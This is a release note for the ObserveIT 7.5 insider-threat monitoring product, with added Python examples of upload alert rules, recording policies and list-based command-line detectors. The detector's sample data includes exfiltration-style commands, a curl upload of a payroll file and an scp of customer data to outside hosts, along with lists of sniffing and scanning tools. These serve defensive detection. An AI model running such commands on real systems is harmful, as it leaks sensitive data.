ObserveIT ⬥ WHAT’S NEW IN OBSERVEIT 7.5 1
WHAT’S NEW IN OBSERVEIT 7.5
ObserveIT 7.5 is an important milestone for ObserveIT’s Insider Threat Management solution.
Its new features and functionality help security teams identify, investigate and eliminate insider
threats. This release advances our modern approach to insider threat detection and prevention for
the post-DLP world, bringing user activity and data activity together with analytics.
ObserveIT can now protect organizations against one of the most common ways for users to exfiltrate
data: uploading files to the web.
Whether the file was originally downloaded from a company website or portal and tracked by ObserveIT,
or is simply a file stored on a local disk or a shared network drive, ObserveIT 7.5 can now detect
and alert when it is uploaded to the web. This covers a wide range of data exfiltration scenarios,
such as emailing sensitive files to personal webmail accounts, or uploading them to cloud storage,
social media or collaboration sites.
Adding the new file upload capabilities to the existing capabilities of monitoring and tracking files that
were downloaded via a browser, plus monitoring attempts to move such files to a cloud storage sync
folder – ObserveIT 7.5 now provides an end-to-end solution for monitoring file activity over the web, as
presented in the following diagram:
ObserveIT 7.5 helps Security Analysts and Investigators to identify and resolve incidents faster by
exposing File Activity Meta-data (FAM) in more modules across the Management Console, specifically in
Search and Video Player.
ObserveIT 7.5 keeps improving the scalability of the product by dramatically cutting archive
processing time. Reducing the size of the meta-data sent from agents to the backend servers makes
better use of existing infrastructure (lower TCO) and increases performance.
ObserveIT 7.5 integrates better with security tools and processes by adopting an API-first approach.
Additionally, it introduces modern and faster APIs to retrieve recorded meta-data and aggregated User
Activity Profile (UAP) data to be used by SIEM and analytic products. All APIs are available from a new
Developer Portal.
ObserveIT 7.5 keeps improving the Mac agent as the demand for monitoring users on Mac is growing.
Printing activity is now monitored on Mac, and user activity on Mac can be easily detected using new
icons in the Management Console.
OBSERVEIT 7.5 KEY NEW FEATURES
Monitor any file being uploaded to web – detect and stop data exfiltration
✓ Monitor and alert on any file being uploaded to any website.
✓ Alert by specific websites or web categories (e.g. Web Mail).
✓ For tracked files (originally downloaded from web) – a full history of the uploaded file is available.
FAM & enriched context across the Management Console – faster investigation
✓ Search now includes FAM data as searching options and in the results list.
✓ Activity list in Video Player shows application context and FAM data.
Exclude website categories from being recorded – protect employee privacy
✓ Control which specific web categories to record, exclude, or record as meta-data only.
Integration and Enterprise Readiness – address IT and security needs raised by customers
✓ Significantly cut down the time it takes to archive screenshot data stored on the file system.
✓ New Report & Analytics APIs (SIEM and UAP) and new Authentication API.
✓ Manage endpoints by their machine IP address (in addition to endpoint name).
Insider Threat Library (ITL) – out of the box rules to detect insider threats
✓ 66 new rules added, detecting more threats on all supported platforms.
✓ Enriched content of OOB lists with more suspicious tools to detect, also on Mac.
Mac Agent – more data exfiltration scenarios and easier investigation
✓ Monitor printing activity on Mac.
✓ Mac icon and OS type are used across the Management Console.
DATA EXFILTRATION: MONITOR FILE UPLOADS TO THE WEB
A common way to take data out is by uploading files to external websites. Whether sending a file with
sensitive data to a personal webmail account (e.g. Gmail), attaching it to a Facebook or LinkedIn
message, uploading it to Google Drive, or sending it to a personal email address via WeTransfer, there
are countless easy ways for someone to exfiltrate data using nothing more than a web browser and an
internet connection.
Organizations can block access to some of the known channels; however, this may disrupt everyday
business, since some of these websites are legitimately used from time to time. In addition, there are
too many websites to manage, and new sites appear frequently.
ObserveIT 7.5 monitors any attempt to upload a file to any website.
Now you can:
➢ Alert when a tracked file is sent out as a webmail attachment (e.g. Gmail).
➢ Alert when any sensitive file is uploaded to social media sites, file sharing, cloud storage or any other
website.
➢ Educate and deter users by displaying just-in-time warnings or blocking messages when a suspicious
upload activity is detected.
➢ Track the full history of the uploaded tracked file – back to the original download site (if the file was
originally downloaded from web).
➢ Easily search uploaded files by their name, location, target website, uploading user, and more.
➢ For tracked files you can also search by the original file name and original website. For example, you
can search for the following activity using the File Diary:
“Show all file uploads by John, but only those files that were originally downloaded from
Salesforce as Excel files”.
Even if the user renamed the file before the upload, ObserveIT will still know that this file is originally
an Excel file that was downloaded from Salesforce.
Monitoring files uploaded to any website
Alerts on file uploads are very flexible. You can define alerts based on:
➢ File name, e.g. any file name containing “strategy”
➢ File type, e.g. file names ending with “.xls” or “.xlsx”
➢ Target web site or web category, e.g. “facebook.com” or “Social Media Site”
➢ File location, e.g. “\\fileshare\finance\payments\2018”
➢ For tracked files, you can alert also based on the original file name and the website it was
downloaded from.
Example: Alert on any downloaded MS-OFFICE file being uploaded to any webmail, social, IM, or cloud storage
website – except for box.com (which is used for in-house file collaboration)
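As an added illustration, not code from ObserveIT, here is how the alert rule in the example above and the File Diary query from the previous page ("all uploads by John of files originally downloaded from Salesforce as Excel files") can be expressed over FAM events. The event fields, the web category table and the sample events are assumptions made for this example; the product's own rule engine and data model are not shown here.

```python
"""Added example (not ObserveIT's own code): evaluating a file-upload alert rule and a
File Diary style query over constructed File Activity Meta-data (FAM) events.
The category table, field names and sample events are assumptions for illustration."""
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Hypothetical web categorization table (the product's real categories are assumed).
SITE_CATEGORY = {
    "mail.google.com": "Web Mail",
    "outlook.live.com": "Web Mail",
    "facebook.com": "Social Media",
    "linkedin.com": "Social Media",
    "drive.google.com": "Cloud Storage",
    "box.com": "Cloud Storage",
    "wetransfer.com": "File Sharing",
    "salesforce.com": "Enterprise Web Application",
}
OFFICE_EXTENSIONS = (".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
EXFIL_CATEGORIES = {"Web Mail", "Social Media", "Instant Messaging",
                    "File Sharing", "Cloud Storage"}


def host_matches(host: str, domain: str) -> bool:
    """True for the domain itself and any subdomain (app.box.com matches box.com)."""
    host = host.lower()
    return host == domain or host.endswith("." + domain)


def site_category(host: str) -> str:
    for domain, category in SITE_CATEGORY.items():
        if host_matches(host, domain):
            return category
    return "Uncategorized"


@dataclass
class FamEvent:
    user: str
    action: str                 # "download", "upload", "rename", "copy", ...
    file_name: str              # name at the time of the event
    location: str               # local path or UNC share
    site: str = ""              # target host (upload) or source host (download)
    original_name: Optional[str] = None   # tracked files only: name when downloaded
    original_site: Optional[str] = None   # tracked files only: site it came from


def matches_office_exfil_rule(ev: FamEvent) -> bool:
    """The rule from the text: any downloaded MS Office file uploaded to a webmail,
    social, IM, file-sharing or cloud-storage site, except box.com."""
    if ev.action != "upload" or ev.original_site is None:
        return False                      # untracked uploads are out of scope for this rule
    # Judge the file by its original name, so a rename before upload does not evade the rule.
    if not (ev.original_name or ev.file_name).lower().endswith(OFFICE_EXTENSIONS):
        return False
    if host_matches(ev.site, "box.com"):
        return False                      # in-house collaboration exception
    return site_category(ev.site) in EXFIL_CATEGORIES


def evaluate(events: Iterable[FamEvent]) -> List[FamEvent]:
    return [ev for ev in events if matches_office_exfil_rule(ev)]


def uploads_by_origin(events: Iterable[FamEvent], user: str,
                      origin_domain: str, origin_ext: tuple) -> List[FamEvent]:
    """'Show all uploads by <user> of files originally downloaded from <site> as <type>',
    matched on the original name and site rather than the possibly renamed current name."""
    return [ev for ev in events
            if ev.action == "upload" and ev.user == user and ev.original_site
            and host_matches(ev.original_site, origin_domain)
            and (ev.original_name or "").lower().endswith(origin_ext)]


# Constructed sample events (not real data).
SAMPLE_EVENTS = [
    FamEvent("john", "download", "Q3-forecast.xlsx", r"C:\Users\john\Downloads",
             site="app.salesforce.com", original_name="Q3-forecast.xlsx",
             original_site="app.salesforce.com"),
    FamEvent("john", "rename", "notes.dat", r"C:\Users\john\Downloads",
             original_name="Q3-forecast.xlsx", original_site="app.salesforce.com"),
    FamEvent("john", "upload", "notes.dat", r"C:\Users\john\Downloads",
             site="mail.google.com", original_name="Q3-forecast.xlsx",
             original_site="app.salesforce.com"),
    FamEvent("alice", "upload", "report.docx", r"\\fileshare\finance\payments\2018",
             site="app.box.com", original_name="report.docx", original_site="portal.example.com"),
    FamEvent("bob", "upload", "photo.png", r"C:\Users\bob\Pictures", site="facebook.com"),
]

if __name__ == "__main__":
    for ev in evaluate(SAMPLE_EVENTS):
        print(f"ALERT {ev.user} uploaded {ev.file_name} (was {ev.original_name} "
              f"from {ev.original_site}) to {ev.site}")
    for ev in uploads_by_origin(SAMPLE_EVENTS, "john", "salesforce.com", (".xls", ".xlsx")):
        print(f"FOUND {ev.file_name} <- {ev.original_name}")
```

Running the block reports one alert (john's renamed spreadsheet reaching Gmail); alice's upload to app.box.com is suppressed by the exception, and bob's untracked image is outside this rule's scope. Matching on the original name and site is what keeps a rename before upload from evading the rule, and the same lineage is what the File Diary query relies on.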
SEARCH: INCLUDES FILE ACTIVITY METADATA (FAM)
Security analysts can now search for any user or data activity including file downloads & uploads, copy to
cloud, and more.
FAM data is integrated into the Search module allowing you to:
➢ View search results for file activity together with all other user activity
➢ Find specific data activity (e.g. file download, upload) from the Search window. No need to go to the
File Diary for that.
For example, searching for “roadmap.pptx”, will return any user or data activity related to the file name:
➢ Any download of “roadmap.pptx”
➢ Any upload of “roadmap.pptx”
➢ Any copy/move of “roadmap.pptx”
➢ Copy of “roadmap.pptx” to one of the supported Cloud vendor’s sync folders
➢ Printing of “roadmap.pptx”
➢ Renaming or deleting the file (in case of a tracked file)
➢ Viewing the file, e.g. Window title contains “roadmap.pptx”
➢ Using “roadmap.pptx” as part of a URL address
➢ Using “roadmap.pptx” as part of a command line
New search options help you to quickly focus on both User and Data Activity
VIDEO PLAYER: RICHER CONTEXT IN USER ACTIVITY LIST
During session playback, it is important to see the full context of what happened through the session.
ObserveIT 7.5 helps Security Analysts and Investigators to respond faster by providing richer context in
the user activity list:
➢ Application / Website
Every activity now shows the application (or website for web activity) in which the activity
occurred
➢ FAM data
FAM activity, such as file download, upload, copy to cloud and so on, is now displayed together
with all other user activities, in the correct chronological order.
ARCHIVE: SIGNIFICANTLY REDUCE PROCESSING TIME
As ObserveIT deployments grow, so does the time needed to archive or delete the recorded
screenshots. ObserveIT 7.5 redesigns the way screenshot data is stored on the file system to
significantly reduce archive processing time, especially in large deployments.
ObserveIT 7.5 can archive or delete up to 6 times faster than earlier releases, allowing
customers to complete processing within the allocated nightly batch window.
This improvement is relevant for video recording with screenshots stored in the file system.
The improvement comes from packing each completed session into a single file: copying or deleting
one file per session is much faster than copying or deleting the many individual image files it replaces.
To enable the new capability, you need to select the appropriate storage mode as shown below.
Configuring Screen Storage Optimization for best performance
PRIVACY: EXCLUDE WEBSITE CATEGORIES FROM BEING RECORDED
Protecting employee privacy is an important goal for our customers – and therefore for us.
Customers sometimes need to avoid recording certain types of websites that are considered personal
and are usually unrelated to work (e.g. Social Media, Financial Products).
ObserveIT 7.5 allows you to exclude such websites from being recorded by simply identifying the web
category you wish to exclude. Using our website categorization capabilities, ObserveIT can match any
URL visited by the user to the right category.
You can also decide to only record meta-data (i.e. no video) for the selected categories, so you can still
have meta-data for detection and investigation – and turn on video only upon alert.
If needed, you can also decide to record only certain web categories.
Excluding personal website categories from being fully recorded
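As an added illustration of how such a policy resolves for a given URL, the following (not ObserveIT code) assigns a recording mode by web category and shows the "video only upon alert" escalation. The category table, the policy keys and the mode names are assumptions; the product's actual settings are configured in the Management Console.

```python
"""Added example (not ObserveIT's own code): choosing a recording mode per visited URL
from its web category. The category table, policy keys and mode names are assumptions."""
from urllib.parse import urlsplit

# Hypothetical categorization table (the product's own is not reproduced).
CATEGORY_BY_DOMAIN = {
    "facebook.com": "Social Media",
    "twitter.com": "Social Media",
    "bankofexample.com": "Financial Products",
    "mail.google.com": "Web Mail",
    "salesforce.com": "Enterprise Web Application",
}

# Modes as used here: "full" (video + meta-data), "metadata" (meta-data, no video), "none".
POLICY = {
    "exclude": {"Financial Products"},               # never recorded at all
    "metadata_only": {"Social Media", "Web Mail"},   # keep detection data, no video
    "record_only": None,                             # restrict recording to these categories, or None
}


def categorize(url: str) -> str:
    if "://" not in url:
        url = "http://" + url            # bare host names as seen in browser telemetry
    host = (urlsplit(url).hostname or "").lower()
    for domain, category in CATEGORY_BY_DOMAIN.items():
        if host == domain or host.endswith("." + domain):
            return category
    return "Uncategorized"


def recording_mode(url: str, policy: dict = POLICY) -> str:
    """Exclusion wins over everything; a record-only allow list drops the rest;
    metadata-only downgrades video; everything else is fully recorded."""
    category = categorize(url)
    if category in policy.get("exclude", set()):
        return "none"
    allowed = policy.get("record_only")
    if allowed is not None and category not in allowed:
        return "none"
    if category in policy.get("metadata_only", set()):
        return "metadata"
    return "full"


def mode_after_alert(url: str, alerted: bool, policy: dict = POLICY) -> str:
    """'Turn on video only upon alert': a metadata-only site is escalated to full recording
    once an alert fires; an excluded site produced no meta-data, so there is nothing to escalate."""
    mode = recording_mode(url, policy)
    return "full" if alerted and mode == "metadata" else mode


if __name__ == "__main__":
    for url in ("https://www.facebook.com/messages", "https://online.bankofexample.com/login",
                "https://app.salesforce.com/", "unknown.example"):
        print(f"{url}: {recording_mode(url)} -> on alert: {mode_after_alert(url, True)}")
```

Precedence is the point to check when configuring this: an excluded category yields no meta-data at all, so no alert can ever fire for it and nothing can be escalated to video; a metadata-only category still feeds detection and investigation and can be switched to full recording when an alert fires.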
INTEGRATIONS: DEVELOPER PORTAL
ObserveIT is deeply integrated within the security fabric of organizations, with native integrations into top
software and systems.
With ObserveIT 7.5, we’re launching a revamped developer portal that enables our customers and
partners to easily build or extend integrations with top SIEM, security automation and orchestration, and
ticketing solutions. Besides the out of the box native apps for Splunk, IBM QRadar, LogRhythm, and
others, developers can use the RESTful APIs to access comprehensive metadata around users and their
data activity with real-time alerts.
ObserveIT Developer Portal
The new Developer Portal supports the following RESTful APIs:

API                          Description
Report API                   User activity and alerts exported to SIEM, analytics, orchestration and other tools.
                             Note: exporting data to SIEM is about 20 times faster in ObserveIT 7.5.
Report Analytics API (UAP)   Aggregated activity time spent by the user in applications, websites, endpoints, etc.
Authentication API           OAuth2-based authentication API.
Control API                  List management API.
ITL: NEW AND ENHANCED OUT-OF-THE-BOX RULES
ObserveIT’s Insider Threat Library (ITL) is a set of hundreds of out-of-the-box rules that detect 30
categories of insider threats. Based on feedback from our customers and from market researchers (e.g.
CERT), we keep improving the ITL to better identify and eliminate insider threats.
ObserveIT 7.5 introduces 66 new rules, bringing the total to over 300 ITL rules.
New ITL alerts include:
➢ Exfiltrating ANY file by uploading to web (not just tracked)
➢ Exfiltrating data via command line (ftp, curl, etc.)
➢ Mac specific: Sensitive logins, machine takeover, creating backdoors, etc.
➢ Disabled users (ex-employees) logging in
➢ Tampering with ObserveIT libraries/processes
➢ Suspicious activity in Docker & Container environments (Unix/Linux)
➢ Performing suspicious activity in Git
Many of the rules are based on lists (e.g. Sniffing Tools) for easier management and reuse.
ObserveIT keeps updating the lists to catch up with market changes and to align them with newly
supported agent platforms.
New and enhanced ITL lists include:
➢ Disabled users (ex-employees)
➢ Port scanning
➢ Hacking & password cracking tools
➢ VPN tools
➢ Steganography
➢ Enterprise web applications
➢ Cloud backup tools
➢ P2P tools
➢ Remote login utilities
➢ SQL tools
➢ Command line tools
➢ Unauthorized commands
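To show how list-based rules of this kind work in practice, here is an added example (not ObserveIT's own rules or lists) that runs a few such rules over constructed command-line records, covering the "exfiltrating data via command line (ftp, curl, etc.)" alert and the tool lists above. The list contents, rule names and sample commands are assumptions for illustration.

```python
"""Added example (not ObserveIT's own code): list-based detection rules run over
constructed command-line records, in the style of the ITL tool lists. List contents,
rule names and the sample commands are assumptions for illustration."""
import os
import re
import shlex
from typing import Dict, List, Tuple

# Hypothetical lists; the product's own lists are not reproduced here.
LISTS: Dict[str, set] = {
    "Sniffing Tools": {"tcpdump", "tshark", "wireshark", "ettercap"},
    "Port Scanning": {"nmap", "masscan", "zmap"},
    "Interactive Transfer Clients": {"ftp", "sftp", "tftp"},
    "Upload-capable HTTP Clients": {"curl", "wget"},
    "Remote Copy Tools": {"scp", "rsync"},
}
# Options that make an HTTP client send data rather than fetch it.
UPLOAD_FLAGS = {
    "curl": {"-F", "--form", "-T", "--upload-file", "-d", "--data",
             "--data-binary", "--data-raw", "--data-urlencode"},
    "wget": {"--post-file", "--post-data"},
}
REMOTE_TARGET = re.compile(r"^(?:[\w.-]+@)?[\w.-]+:")   # user@host:path or host:path
WRAPPERS = {"sudo", "nohup", "time"}   # leading wrappers to skip (their own options are not handled)


def program_and_args(cmdline: str) -> Tuple[str, List[str]]:
    try:
        tokens = shlex.split(cmdline)
    except ValueError:                 # unbalanced quotes: fall back to a whitespace split
        tokens = cmdline.split()
    while tokens and (tokens[0] in WRAPPERS or "=" in tokens[0]):
        tokens.pop(0)                  # drop wrappers and VAR=value environment prefixes
    if not tokens:
        return "", []
    return os.path.basename(tokens[0]), tokens[1:]


def detect(cmdline: str) -> List[str]:
    """Return the names of the rules the command line triggers (empty if none)."""
    prog, args = program_and_args(cmdline)
    findings: List[str] = []
    if prog in LISTS["Sniffing Tools"]:
        findings.append("Sniffing tool used")
    if prog in LISTS["Port Scanning"]:
        findings.append("Port scan from endpoint")
    if prog in LISTS["Interactive Transfer Clients"]:
        findings.append("Exfiltrating data via command line")
    if prog in LISTS["Upload-capable HTTP Clients"]:
        # A plain GET is routine admin work; flag only when the client sends data.
        flags = UPLOAD_FLAGS[prog]
        if any(a in flags or a.split("=", 1)[0] in flags for a in args):
            findings.append("Exfiltrating data via command line")
    if prog in LISTS["Remote Copy Tools"]:
        # Outbound copy: the destination (last positional argument) names a remote path.
        positionals = [a for a in args if not a.startswith("-")]
        if positionals and REMOTE_TARGET.match(positionals[-1]):
            findings.append("Exfiltrating data via command line")
    return findings


# Constructed sample command-line records (user, command), not real data.
SAMPLE_COMMANDS = [
    ("jdoe", 'curl -F "file=@/srv/finance/payroll.xlsx" https://upload.example.net/api'),
    ("jdoe", "scp /data/customers.csv jdoe@203.0.113.5:/tmp/"),
    ("root", "sudo tcpdump -i eth0 -w /tmp/capture.pcap"),
    ("ops", "curl -s https://intranet.example.com/health"),
    ("ops", "rsync -av /var/log/ /backup/logs/"),
    ("ops", "ls -la /srv"),
]


def scan(records) -> List[Tuple[str, str, List[str]]]:
    """Apply every rule to every record and keep only the records that triggered one."""
    hits = []
    for user, cmd in records:
        found = detect(cmd)
        if found:
            hits.append((user, cmd, found))
    return hits


if __name__ == "__main__":
    for user, cmd, found in scan(SAMPLE_COMMANDS):
        print(f"{user}: {cmd}\n    -> {', '.join(found)}")
```

Keeping the tool names in lists separate from the rule logic is what lets a list be updated (a new sniffer, a newly supported platform's binaries) without touching the rules that use it. The HTTP client rule deliberately looks for data-sending options rather than the bare tool name, because curl without them is everyday administrative traffic; the remote copy rule looks at the destination, so a local rsync backup does not fire.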
MANAGE ENDPOINTS BY MACHINE IP
Some IT organizations prefer to manage their endpoints by their machine IP address versus by the
machine name.
In the previous release (7.4) we added support for IP ranges (CIDR), while in ObserveIT 7.5 we simplify
agent management and the investigation process by adding the option to display endpoint IP addresses
across the Management Console (Diaries, Search, Reports, Alerts, etc.) – in addition to the endpoint
name.
Showing endpoint IP address in the Endpoint Diary
As one endpoint can have multiple IP addresses, the displayed address is the one the agent uses to
connect to the Application Server. This capability is most useful where endpoints have fixed rather
than dynamic IP addresses.
MAC AGENT ENHANCEMENTS
ObserveIT 7.5 introduces a better Mac agent that can detect data exfiltration done via Printing. In
addition, the visibility of Mac endpoints and user activity in the Management Console is enhanced.
MONITORING PRINTING ACTIVITY
Printing is still a common way for users to take data out. ObserveIT 7.5 introduces new capability to
monitor printing activity on Mac, allowing customers to search and report on any printing activity, and to
define alerts on suspicious printing activity.
The meta-data collected on printing includes:
➢ Printer name
➢ Document name
➢ Number of pages sent to the printer
MAC PRESENCE IN THE MANAGEMENT CONSOLE
To make the management of Mac endpoints easier, and to make investigation faster, ObserveIT 7.5
displays a Mac icon near recorded Mac sessions, Mac endpoints, Mac endpoint groups, etc.
Mac OS type is available in various filters to quickly focus on Mac-specific activity.
Mac endpoints and user activity easily spotted with new Mac icon
NEW PLATFORMS
ObserveIT 7.5 supports recently introduced platforms to allow maximum coverage across the
organization.
Product Component   New Platforms
Windows agent       DBA Activity support for Microsoft SSMS 17.1, 17.2 and 17.3
Citrix agent        XenDesktop and XenApp 7.15
Linux agent         Oracle Linux 6.9; Debian 9; Amazon Linux 2017.09
Database Server     Microsoft SQL Server 2017
* Support for Microsoft SQL Server 2008 has been dropped.